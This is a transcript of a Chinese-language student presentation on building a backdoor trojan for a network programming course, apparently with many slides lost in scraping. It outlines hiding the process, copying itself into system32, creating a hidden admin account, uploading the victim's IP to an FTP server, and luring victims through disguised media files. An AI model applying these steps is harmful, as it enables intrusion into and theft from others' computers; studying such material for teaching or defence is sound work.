後門程式實作 組員： 　　　596435015陳柚蓁 　　　596435009蔡瑞得 　　　596435007楊明鑫 網路程式設計.

Presentation on theme: "後門程式實作 組員： 　　　596435015陳柚蓁 　　　596435009蔡瑞得 　　　596435007楊明鑫 網路程式設計."— Presentation transcript:

1 後門程式實作 組員： 　　　 陳柚蓁 　　　 蔡瑞得 　　　 楊明鑫 網路程式設計

2 Introduction Purpose Open backdoor (Telnet、終端機) get最高權限的帳戶 get被駭電腦IP
進行各種駭客任務 網路程式設計

3 Introduction 執行環境 輔助tools Microsoft Windows XP BackDoor.sf6
Setup Factory 6.0 FTP server 網頁空間 Camtasia Studio 4 網路程式設計

4 木馬製作 SetupFactory是一套為寫好的軟體設計安裝的工具，也可被駭客拿來設計木馬與相關工具 將寫好的木馬存成.sf6檔
網路程式設計

5 木馬製作 網路程式設計

6 木馬包製流程 網路程式設計

7 木馬製作 網路程式設計

8 木馬製作 網路程式設計

9 木馬製作 網路程式設計

10 木馬製作 網路程式設計

11 木馬製作 網路程式設計

12 木馬製作 網路程式設計

13 木馬製作 網路程式設計

14 木馬製作 網路程式設計

15 木馬製作 網路程式設計

16 木馬製作 網路程式設計

17 木馬製作 使用動態IP將自己的電腦當作FTP簡易伺服器 (下載FTP server)
將FTP簡易伺服器的IP位址存成ipx.txt上傳到某網頁空間 ipx.txt內key: xxx.xxx.xxx.xxx PUT c:\ip.txt victimip.txt ↑ (FTP server的IP位址) 網路程式設計

18 木馬製作 網路程式設計

19 木馬製作 網路程式設計

20 木馬製作 網路程式設計

21 木馬製作 網路程式設計

22 木馬製作後 這個木馬完成後，駭客可以用各種藉口或理由 利用各種管道 送給被駭者 (影片、動畫、遊戲、音樂) (E-Mail、即時通、聊天室)
網路程式設計

23 被駭電腦 C:\WINDOWS\system32 使用者帳戶 產生bkdoor0.tmp 複製木馬資訊為systemdr.exe
產生一個駭客建立擁有最高權限的帳戶 網路程式設計

24 駭客操控 登入被駭者電腦 行為 DOS指令： telnet –t ansi 被駭者電腦IP 輸入使用者帳號密碼 偷看 竊取 修改 刪除
網路程式設計

25 DOS command DIR/W 顯示檔案名稱 FORMAT 格式化 ,例: FORMAT C: COPY
複製檔案 ,例:COPY　A:　lmi.txt　C: DEL 刪除檔案 REN 將檔案重新命名 MD 建立一個新的資料夾 TYPE 列印文字檔用 CLS 清除螢幕 網路程式設計

26 functions DWORD dwVersion = GetVersion（）;
得到操作系統的版本號 typedef DWORD （CALLBACK* LPREGISTERSERVICEPROCESS）（DWORD,DWORD）; 定義RegisterServiceProcess（）函數的原型 hDLL = LoadLibrary（"KERNEL32"）; 加載RegisterServiceProcess（）函數所在的動態鏈接庫KERNEL32.DLL 網路程式設計

27 functions RegisterServiceProcess（）;
隱藏本進程 GetSystemDirectory（TempPath ,MAX_PATH）; TempPath是system目錄緩衝區的地址,MAX_PATH是緩衝區的大小，得到目標機的System目錄路徑 AnsiString（SystemPath+"\\Systemdr.exe"）.c_str（） ,FALSE）; 將自己拷貝到%System%目錄下，並改名為Systemdr.exe 網路程式設計

28 參考文獻 駭客攻防技術擂台 網路安全設定與網路入侵防護 何謂後門程式(Backdoor) 病毒與惡性程式碼
Computer: Event: 有趣的木馬解剖 網路程式設計

29 分工配置 明鑫…協尋相關知識 柚蓁…程式與實作 瑞得…提供資料與書面報告 網路程式設計